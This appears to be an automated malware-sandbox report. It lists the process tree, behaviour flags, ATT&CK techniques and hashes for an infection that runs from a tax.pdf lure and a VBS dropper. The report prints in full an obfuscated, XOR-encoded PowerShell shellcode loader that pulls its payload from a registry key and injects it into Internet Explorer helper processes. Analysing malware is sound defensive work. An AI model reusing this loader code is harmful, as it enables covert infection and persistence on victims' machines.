        "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";Function Stambestning0 { param([String]$Manumitting); $Produktionsapparaters238 = New-Object byte[] ($Manumitting.Length / 2); For($betjentformndene=0; $betjentformndene -lt $Manumitting.Length; $betjentformndene+=2){ $Produktionsapparaters238[$betjentformndene/2] = [convert]::ToByte($Manumitting.Substring($betjentformndene, 2), 16); $Produktionsapparaters238[$betjentformndene/2] = ($Produktionsapparaters238[$betjentformndene/2] -bxor 190); } [String][System.Text.Encoding]::ASCII.GetString($Produktionsapparaters238);}$Plenumdiskussioners0=Stambestning0 'EDC7CDCADBD390DAD2D2';$Plenumdiskussioners1=Stambestning0 'F3D7DDCCD1CDD1D8CA90E9D7D08D8C90EBD0CDDFD8DBF0DFCAD7C8DBF3DBCAD6D1DACD';$Plenumdiskussioners2=Stambestning0 'F9DBCAEECCD1DDFFDADACCDBCDCD';$Plenumdiskussioners3=Stambestning0 'EDC7CDCADBD390ECCBD0CAD7D3DB90F7D0CADBCCD1CEEDDBCCC8D7DDDBCD90F6DFD0DAD2DBECDBD8';$Plenumdiskussioners4=Stambestning0 'CDCACCD7D0D9';$Plenumdiskussioners5=Stambestning0 'F9DBCAF3D1DACBD2DBF6DFD0DAD2DB';$Plenumdiskussioners6=Stambestning0 'ECEAEDCEDBDDD7DFD2F0DFD3DB929EF6D7DADBFCC7EDD7D9929EEECBDCD2D7DD';$Plenumdiskussioners7=Stambestning0 'ECCBD0CAD7D3DB929EF3DFD0DFD9DBDA';$Plenumdiskussioners8=Stambestning0 'ECDBD8D2DBDDCADBDAFADBD2DBD9DFCADB';$Plenumdiskussioners9=Stambestning0 'F7D0F3DBD3D1CCC7F3D1DACBD2DB';$Apogalacteum0=Stambestning0 'F3C7FADBD2DBD9DFCADBEAC7CEDB';$Apogalacteum1=Stambestning0 'FDD2DFCDCD929EEECBDCD2D7DD929EEDDBDFD2DBDA929EFFD0CDD7FDD2DFCDCD929EFFCBCAD1FDD2DFCDCD';$Apogalacteum2=Stambestning0 'F7D0C8D1D5DB';$Apogalacteum3=Stambestning0 'EECBDCD2D7DD929EF6D7DADBFCC7EDD7D9929EF0DBC9EDD2D1CA929EE8D7CCCACBDFD2';$Apogalacteum4=Stambestning0 'E8D7CCCACBDFD2FFD2D2D1DD';$Apogalacteum5=Stambestning0 'D0CADAD2D2';$Apogalacteum6=Stambestning0 'F0CAEECCD1CADBDDCAE8D7CCCACBDFD2F3DBD3D1CCC7';$Apogalacteum7=Stambestning0 'F7FBE6';$Apogalacteum8=Stambestning0 'E2';$Troendes=Stambestning0 'EBEDFBEC8D8C';$elfriedas=Stambestning0 'FDDFD2D2E9D7D0DAD1C9EECCD1DDFF';function Stambestning22 {Param ($Clodpoll, $Selvforsynendes) ;$Conbinas0 =Stambestning0 '9AD8DFD2DACDCADFD3D3DBCCD0DBCD9E839E96E5FFCECEFAD1D3DFD7D0E38484FDCBCCCCDBD0CAFAD1D3DFD7D090F9DBCAFFCDCDDBD3DCD2D7DBCD96979EC29EE9D6DBCCDB93F1DCD4DBDDCA9EC59E9AE190F9D2D1DCDFD2FFCDCDDBD3DCD2C7FDDFDDD6DB9E93FFD0DA9E9AE190F2D1DDDFCAD7D1D090EDCED2D7CA969AFFCED1D9DFD2DFDDCADBCBD38697E5938FE390FBCFCBDFD2CD969AEED2DBD0CBD3DAD7CDD5CBCDCDD7D1D0DBCCCD8E979EC39790F9DBCAEAC7CEDB969AEED2DBD0CBD3DAD7CDD5CBCDCDD7D1D0DBCCCD8F97';.$Apogalacteum7 $Conbinas0;$Conbinas5 = Stambestning0 '9AEEDBCCCDD1D0D7D8D7DDDBCCD7D0D9DBCCD0DBCD9E839E9AD8DFD2DACDCADFD3D3DBCCD0DBCD90F9DBCAF3DBCAD6D1DA969AEED2DBD0CBD3DAD7CDD5CBCDCDD7D1D0DBCCCD8C929EE5EAC7CEDBE5E3E39EFE969AEED2DBD0CBD3DAD7CDD5CBCDCDD7D1D0DBCCCD8D929E9AEED2DBD0CBD3DAD7CDD5CBCDCDD7D1D0DBCCCD8A9797';.$Apogalacteum7 $Conbinas5;$Conbinas1 = Stambestning0 'CCDBCACBCCD09E9AEEDBCCCDD1D0D7D8D7DDDBCCD7D0D9DBCCD0DBCD90F7D0C8D1D5DB969AD0CBD2D2929EFE96E5EDC7CDCADBD390ECCBD0CAD7D3DB90F7D0CADBCCD1CEEDDBCCC8D7DDDBCD90F6DFD0DAD2DBECDBD8E396F0DBC993F1DCD4DBDDCA9EEDC7CDCADBD390ECCBD0CAD7D3DB90F7D0CADBCCD1CEEDDBCCC8D7DDDBCD90F6DFD0DAD2DBECDBD89696F0DBC993F1DCD4DBDDCA9EF7D0CAEECACC97929E969AD8DFD2DACDCADFD3D3DBCCD0DBCD90F9DBCAF3DBCAD6D1DA969AEED2DBD0CBD3DAD7CDD5CBCDCDD7D1D0DBCCCD8B979790F7D0C8D1D5DB969AD0CBD2D2929EFE969AFDD2D1DACED1D2D297979797929E9AEDDBD2C8D8D1CCCDC7D0DBD0DADBCD9797';.$Apogalacteum7 $Conbinas1;}function Stambestning23 {Param ([Parameter(Position = 0)] [Type[]] $Agalactia,[Parameter(Position = 1)] [Type] $nationalispbr = [Void]);$Conbinas2 = Stambestning0 '9AECDBDAD7D8D8DBCCDBD0DDDBCC9E839EE5FFCECEFAD1D3DFD7D0E38484FDCBCCCCDBD0CAFAD1D3DFD7D090FADBD8D7D0DBFAC7D0DFD3D7DDFFCDCDDBD3DCD2C79696F0DBC993F1DCD4DBDDCA9EEDC7CDCADBD390ECDBD8D2DBDDCAD7D1D090FFCDCDDBD3DCD2C7F0DFD3DB969AEED2DBD0CBD3DAD7CDD5CBCDCDD7D1D0DBCCCD869797929EE5EDC7CDCADBD390ECDBD8D2DBDDCAD7D1D090FBD3D7CA90FFCDCDDBD3DCD2C7FCCBD7D2DADBCCFFDDDDDBCDCDE38484ECCBD09790FADBD8D7D0DBFAC7D0DFD3D7DDF3D1DACBD2DB969AEED2DBD0CBD3DAD7CDD5CBCDCDD7D1D0DBCCCD87929E9AD8DFD2CDDB9790FADBD8D7D0DBEAC7CEDB969AFFCED1D9DFD2DFDDCADBCBD38E929E9AFFCED1D9DFD2DFDDCADBCBD38F929EE5EDC7CDCADBD390F3CBD2CAD7DDDFCDCAFADBD2DBD9DFCADBE397';.$Apogalacteum7 $Conbinas2;$Conbinas3 = Stambestning0 '9AECDBDAD7D8D8DBCCDBD0DDDBCC90FADBD8D7D0DBFDD1D0CDCACCCBDDCAD1CC969AEED2DBD0CBD3DAD7CDD5CBCDCDD7D1D0DBCCCD88929EE5EDC7CDCADBD390ECDBD8D2DBDDCAD7D1D090FDDFD2D2D7D0D9FDD1D0C8DBD0CAD7D1D0CDE38484EDCADFD0DADFCCDA929E9AFFD9DFD2DFDDCAD7DF9790EDDBCAF7D3CED2DBD3DBD0CADFCAD7D1D0F8D2DFD9CD969AEED2DBD0CBD3DAD7CDD5CBCDCDD7D1D0DBCCCD8997';.$Apogalacteum7 $Conbinas3;$Conbinas4 = Stambestning0 '9AECDBDAD7D8D8DBCCDBD0DDDBCC90FADBD8D7D0DBF3DBCAD6D1DA969AFFCED1D9DFD2DFDDCADBCBD38C929E9AFFCED1D9DFD2DFDDCADBCBD38D929E9AD0DFCAD7D1D0DFD2D7CDCEDCCC929E9AFFD9DFD2DFDDCAD7DF9790EDDBCAF7D3CED2DBD3DBD0CADFCAD7D1D0F8D2DFD9CD969AEED2DBD0CBD3DAD7CDD5CBCDCDD7D1D0DBCCCD8997';.$Apogalacteum7 $Conbinas4;$Conbinas5 = Stambestning0 'CCDBCACBCCD09E9AECDBDAD7D8D8DBCCDBD0DDDBCC90FDCCDBDFCADBEAC7CEDB9697';.$Apogalacteum7 $Conbinas5 ;}$Boom = Stambestning0 'D5DBCCD0DBD28D8C';$Conbinas6 = Stambestning0 '9AF0DFC8D7DDDBCCCACD9E839EE5EDC7CDCADBD390ECCBD0CAD7D3DB90F7D0CADBCCD1CEEDDBCCC8D7DDDBCD90F3DFCCCDD6DFD2E38484F9DBCAFADBD2DBD9DFCADBF8D1CCF8CBD0DDCAD7D1D0EED1D7D0CADBCC9696EDCADFD3DCDBCDCAD0D7D0D98C8C9E9AFCD1D1D39E9AFFCED1D9DFD2DFDDCADBCBD38A97929E96EDCADFD3DCDBCDCAD0D7D0D98C8D9EFE96E5F7D0CAEECACCE3929EE5EBF7D0CA8D8CE3929EE5EBF7D0CA8D8CE3929EE5EBF7D0CA8D8CE3979E96E5F7D0CAEECACCE3979797';.$Apogalacteum7 $Conbinas6;$Regenerere = Stambestning22 $Apogalacteum5 $Apogalacteum6;$Conbinas7 = Stambestning0 '9AF6D0CDDBCADFCCD38D9E839E9AF0DFC8D7DDDBCCCACD90F7D0C8D1D5DB96E5F7D0CAEECACCE38484E4DBCCD1929E888B8B929E8EC68D8E8E8E929E8EC68A8E97';.$Apogalacteum7 $Conbinas7;$Conbinas8 = Stambestning0 '9AF2C7D0DBCACADBD0CD9E839E9AF0DFC8D7DDDBCCCACD90F7D0C8D1D5DB96E5F7D0CAEECACCE38484E4DBCCD1929E8C8F8C8D8989888E929E8EC68D8E8E8E929E8EC68A97';.$Apogalacteum7 $Conbinas8;$Suffrutescent=(Get-ItemProperty -Path 'HKCU:\Canonizer222\crosscurrented').Srtrykkene30;$Conbinas9 = Stambestning0 '9AFDD1D0DCD7D0DFCD9E839EE5EDC7CDCADBD390FDD1D0C8DBCCCAE38484F8CCD1D3FCDFCDDB888AEDCACCD7D0D9969AEDCBD8D8CCCBCADBCDDDDBD0CA97';.$Apogalacteum7 $Conbinas9;$Suffrutescent0 = Stambestning0 'E5EDC7CDCADBD390ECCBD0CAD7D3DB90F7D0CADBCCD1CEEDDBCCC8D7DDDBCD90F3DFCCCDD6DFD2E38484FDD1CEC7969AFDD1D0DCD7D0DFCD929E8E929E9E9AF6D0CDDBCADFCCD38D929E888B8B97';.$Apogalacteum7 $Suffrutescent0;$Twitchety=$Conbinas.count-655;$Suffrutescent1 = Stambestning0 'E5EDC7CDCADBD390ECCBD0CAD7D3DB90F7D0CADBCCD1CEEDDBCCC8D7DDDBCD90F3DFCCCDD6DFD2E38484FDD1CEC7969AFDD1D0DCD7D0DFCD929E888B8B929E9AF2C7D0DBCACADBD0CD929E9AEAC9D7CADDD6DBCAC797';.$Apogalacteum7 $Suffrutescent1;$Suffrutescent2 = Stambestning0 '9AF8D2D7D0CADCCDCDDBD09E839EE5EDC7CDCADBD390ECCBD0CAD7D3DB90F7D0CADBCCD1CEEDDBCCC8D7DDDBCD90F3DFCCCDD6DFD2E38484F9DBCAFADBD2DBD9DFCADBF8D1CCF8CBD0DDCAD7D1D0EED1D7D0CADBCC9696EDCADFD3DCDBCDCAD0D7D0D98C8C9E9AEACCD1DBD0DADBCD9E9ADBD2D8CCD7DBDADFCD97929E96EDCADFD3DCDBCDCAD0D7D0D98C8D9EFE96E5F7D0CAEECACCE3929EE5F7D0CAEECACCE3929EE5F7D0CAEECACCE3929EE5F7D0CAEECACCE3929EE5F7D0CAEECACCE3979E96E5F7D0CAEECACCE3979797';&($Apogalacteum7) $Suffrutescent2;$Suffrutescent3 = Stambestning0 '9AF8D2D7D0CADCCDCDDBD090F7D0C8D1D5DB969AF6D0CDDBCADFCCD38D929AF2C7D0DBCACADBD0CD929AECDBD9DBD0DBCCDBCCDB928E928E97';&($Apogalacteum7) $Suffrutescent3#"
        5⤵
        Checks QEMU agent file
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: MapViewOfSection
        Suspicious use of AdjustPrivilegeToken
        
        PID:5004
      - C:\Program Files (x86)\internet explorer\ieinstal.exe
        
        "C:\Program Files (x86)\internet explorer\ieinstal.exe"
        6⤵
        
        PID:2576
      - C:\Program Files (x86)\internet explorer\ieinstal.exe
        
        "C:\Program Files (x86)\internet explorer\ieinstal.exe"
        6⤵
        
        PID:2704
      - C:\Program Files (x86)\internet explorer\ieinstal.exe
        
        "C:\Program Files (x86)\internet explorer\ieinstal.exe"
        6⤵
        
        PID:2976
      - C:\Program Files (x86)\internet explorer\ieinstal.exe
        
        "C:\Program Files (x86)\internet explorer\ieinstal.exe"
        6⤵
        
        PID:2148
      - C:\Program Files (x86)\internet explorer\ieinstal.exe
        
        "C:\Program Files (x86)\internet explorer\ieinstal.exe"
        6⤵
        
        PID:4892
      - C:\Program Files (x86)\internet explorer\ieinstal.exe
        
        "C:\Program Files (x86)\internet explorer\ieinstal.exe"
        6⤵
        
        PID:2140
      - C:\Program Files (x86)\internet explorer\ieinstal.exe
        
        "C:\Program Files (x86)\internet explorer\ieinstal.exe"
        6⤵
        
        PID:3332
      - C:\Program Files (x86)\internet explorer\ieinstal.exe
        
        "C:\Program Files (x86)\internet explorer\ieinstal.exe"
        6⤵
        
        PID:2924
      - C:\Program Files (x86)\internet explorer\ieinstal.exe
        
        "C:\Program Files (x86)\internet explorer\ieinstal.exe"
        6⤵
        
        PID:4948
      - C:\Program Files (x86)\internet explorer\ieinstal.exe
        
        "C:\Program Files (x86)\internet explorer\ieinstal.exe"
        6⤵
        
        PID:2644
      - C:\Program Files (x86)\internet explorer\ieinstal.exe
        
        "C:\Program Files (x86)\internet explorer\ieinstal.exe"
        6⤵
        
        PID:3572
      - C:\Program Files (x86)\internet explorer\ielowutil.exe
        
        "C:\Program Files (x86)\internet explorer\ielowutil.exe"
        6⤵
        
        PID:2564
      - C:\Program Files (x86)\internet explorer\ielowutil.exe
        
        "C:\Program Files (x86)\internet explorer\ielowutil.exe"
        6⤵
        Checks QEMU agent file
        Adds Run key to start application
        Suspicious use of NtCreateThreadExHideFromDebugger
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of SetWindowsHookEx
        
        PID:2220
- - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Public\tax.pdf"
    3⤵
    - Checks processor information in registry
    - Modifies Internet Explorer settings
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:1712
  - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1096
    - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=0713F0C3C5E7AB402DF358ED9DF14599 --mojo-platform-channel-handle=1760 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        5⤵
        
        PID:2720
    - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=A37F7091654218D3B953442E5E045C69 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=A37F7091654218D3B953442E5E045C69 --renderer-client-id=2 --mojo-platform-channel-handle=1764 --allow-no-sandbox-job /prefetch:1
        5⤵
        
        PID:2680
    - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=40877E3E4A79EE9AF58E1F2CC50B27EF --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=40877E3E4A79EE9AF58E1F2CC50B27EF --renderer-client-id=4 --mojo-platform-channel-handle=2176 --allow-no-sandbox-job /prefetch:1
        5⤵
        
        PID:4044
    - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=18A094E494B3762EEDFE46689DC205EF --mojo-platform-channel-handle=2560 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        5⤵
        
        PID:1972
    - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=FCC9AF57F86C1B7AC17A557FD97D4BB5 --mojo-platform-channel-handle=1816 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        5⤵
        
        PID:3476
    - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=42E33542A86FCDC8A7E6E5500753074E --mojo-platform-channel-handle=2784 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        5⤵
        
        PID:3968

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
54eea9572b8a1295c4226dd63cadef78

SHA1
1572cc403c755aa7faeb0ee2e795d449e61d485f

SHA256
47b23fd79d8b2504103e2ffbd3866956a332f4c6d37625195ca0f5ab76a39ee3

SHA512
ca125313f150c27926efd0832f81964c3a6a72a42fa7a4bb9fb8579661d26b6b29ee621683b7be0c84371ce4b3791dcf9fd9da0836fb67c7dd331012dbd48809

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
d57c452199e8a2c90b430cc70020f268

SHA1
74936b146e638af7d4d47c2ffa9bf957e92b0512

SHA256
9184b60f006d3d3f930be49cd9a3953f740a70a84c769a21443ed2a6681ffa94

SHA512
59bcce22540db45c14f6399e7a15c7dee3d26b2adf7cde753ad7117f006a4ff397d0b17a5e0645bd38073d8e7c68f1dc6a07d67e6dd76bf19b0cbb6919aab6bf

Download Submit
C:\Users\Public\tax.pdf

Filesize
264KB

MD5
3fac49ebb6dba31d5e8b1d2d1a1ac605

SHA1
92c727906f9ead388b105ff55a54aa922600a955

SHA256
537ee71e13924e509a062037e757b54b8a8df9aa29e5c0e2f6508af6172b958e

SHA512
23495c6e91f27abef955064a8f3680fb3611e4577c8229b803b4c3013ab870b0abc60f7eb0a761377bd48169a4b0a4cc8b4a8e7fddb1928fc300d51d1d843bc5

Download Submit
C:\Windows\Tasks\Sacramese.vbs

Filesize
213KB

MD5
4d3aa1341a03126a15b2202568260787

SHA1
dedc9d5cd9d7ab85760411ad34c3384b617ce3b6

SHA256
764dca3e279ab5ad5f1f408f78c0bc32702d417b109a94a59b2292c390cebd6e

SHA512
ab3e3641b4c71eb1bfed14a5186751a8047f78b9b7a800db808fc7d67203d73a94f64dfe4b95edd9c70f66f08f4ff8588ecfb4c03d48a6f04fd76e29ea259686

Download Submit
memory/1404-133-0x000001DC734E0000-0x000001DC73502000-memory.dmp

Filesize
136KB

Download
memory/1404-135-0x00007FFC161A0000-0x00007FFC16C61000-memory.dmp

Filesize
10.8MB

Download
memory/1404-134-0x00007FFC123B0000-0x00007FFC12465000-memory.dmp

Filesize
724KB

Download
memory/1404-136-0x000001DC73A60000-0x000001DC73A7C000-memory.dmp

Filesize
112KB

Download
memory/1404-137-0x000001DC73AB0000-0x000001DC73ADE000-memory.dmp

Filesize
184KB

Download
memory/1404-141-0x00007FFC161A0000-0x00007FFC16C61000-memory.dmp

Filesize
10.8MB

Download
memory/2220-192-0x0000000077DC0000-0x0000000077F63000-memory.dmp

Filesize
1.6MB

Download
memory/2220-190-0x0000000000AB0000-0x0000000001EF1000-memory.dmp

Filesize
20.3MB

Download
memory/2220-196-0x0000000000AB0000-0x0000000001EF1000-memory.dmp

Filesize
20.3MB

Download
memory/2220-191-0x00007FFC36130000-0x00007FFC36325000-memory.dmp

Filesize
2.0MB

Download
memory/2220-187-0x0000000000AB0000-0x0000000001EF1000-memory.dmp

Filesize
20.3MB

Download
memory/2220-198-0x0000000077DC0000-0x0000000077F63000-memory.dmp

Filesize
1.6MB

Download
memory/2220-197-0x00007FFC36130000-0x00007FFC36325000-memory.dmp

Filesize
2.0MB

Download
memory/4964-194-0x00007FFC161A0000-0x00007FFC16C61000-memory.dmp

Filesize
10.8MB

Download
memory/4964-169-0x00007FFC161A0000-0x00007FFC16C61000-memory.dmp

Filesize
10.8MB

Download
memory/4964-183-0x00007FFC161A0000-0x00007FFC16C61000-memory.dmp

Filesize
10.8MB

Download
memory/5004-172-0x0000000004F50000-0x0000000005578000-memory.dmp

Filesize
6.2MB

Download
memory/5004-181-0x00000000091C0000-0x0000000009764000-memory.dmp

Filesize
5.6MB

Download
memory/5004-182-0x0000000007D70000-0x00000000091B1000-memory.dmp

Filesize
20.3MB

Download
memory/5004-180-0x0000000006F90000-0x0000000006FB2000-memory.dmp

Filesize
136KB

Download
memory/5004-184-0x00007FFC36130000-0x00007FFC36325000-memory.dmp

Filesize
2.0MB

Download
memory/5004-185-0x0000000077DC0000-0x0000000077F63000-memory.dmp

Filesize
1.6MB

Download
memory/5004-179-0x0000000007070000-0x0000000007106000-memory.dmp

Filesize
600KB

Download
memory/5004-178-0x00000000062A0000-0x00000000062BA000-memory.dmp

Filesize
104KB

Download
memory/5004-188-0x0000000007D70000-0x00000000091B1000-memory.dmp

Filesize
20.3MB

Download
memory/5004-189-0x0000000077DC0000-0x0000000077F63000-memory.dmp

Filesize
1.6MB

Download
memory/5004-177-0x00000000076F0000-0x0000000007D6A000-memory.dmp

Filesize
6.5MB

Download
memory/5004-176-0x0000000005D90000-0x0000000005DAE000-memory.dmp

Filesize
120KB

Download
memory/5004-175-0x0000000005790000-0x00000000057F6000-memory.dmp

Filesize
408KB

Download
memory/5004-193-0x0000000077DC0000-0x0000000077F63000-memory.dmp

Filesize
1.6MB

Download
